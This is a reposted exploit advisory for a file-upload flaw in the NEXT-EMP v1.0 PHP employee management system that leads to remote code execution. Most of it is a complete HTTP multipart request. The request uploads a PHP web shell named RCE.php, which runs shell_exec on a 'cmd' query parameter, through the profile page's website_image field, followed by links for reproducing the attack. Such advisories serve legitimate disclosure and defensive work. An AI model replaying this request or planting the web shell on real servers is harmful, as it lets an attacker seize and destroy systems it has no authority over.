NEXT-EMP v1.0-Copyright © 2024. All rights reserved. File Upload-FU and Remote Code Execution- 2025-1-29 22:11:37 Author: cxsecurity.com(查看原文) 阅读量:5 收藏
NEXT-EMP v1.0-Copyright © 2024. All rights reserved. File Upload-FU and Remote Code Execution-RCE
# Titles: NEXT-EMP v1.0-Copyright © 2024. All rights reserved. ### File Upload-FU and Remote Code Execution-RCE Vulnerabilities # Author: nu11secur1ty # Date: 01/29/2025 # Vendor: https://www.mayurik.com/ # Software: https://www.mayurik.com/source-code/P8337/complete-employee-management-system-project-in-php-free-download # Reference: https://portswigger.net/web-security/file-upload | https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: The website_image parameter in profile app is vulnerable for File Upload and then Remote Code Execution without any execution permission sanitizing. The attacker can upload absolutely DANGEROUS files on that server and he can destroy it with one click! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: - RCE Exploit: ```RCE POST /pwnedhost/_hr_soft/admin/profile.php HTTP/1.1 Host: 192.168.100.45 Cookie: PHPSESSID=slraqmcub88jc9mdbc968fop7l Content-Length: 1325 Cache-Control: max-age=0 Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Origin: https://192.168.100.45 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHzTVdFgDMQYGBepP Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://192.168.100.45/pwnedhost/_hr_soft/admin/profile.php Accept-Encoding: gzip, deflate, br Priority: u=0, i Connection: keep-alive ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="old_website_image" stupid.png ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="website_image"; filename="RCE.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET["cmd"]); ?> ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="fname" Mayuri ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="lname" K ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="contact" 9529230459 ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="username" mayurik ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="address" India ------WebKitFormBoundaryHzTVdFgDMQYGBepP Content-Disposition: form-data; name="update" ------WebKitFormBoundaryHzTVdFgDMQYGBepP-- ``` # Reproduce: [href](https://www.patreon.com/posts/nextemployee-1-0-121020861) [more](https://www.nu11secur1ty.com/2025/01/nextemployee-10-rce.html) ## Time spent: 00:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2025, cxsecurity.com
如有侵权请联系:admin#unsafe.sh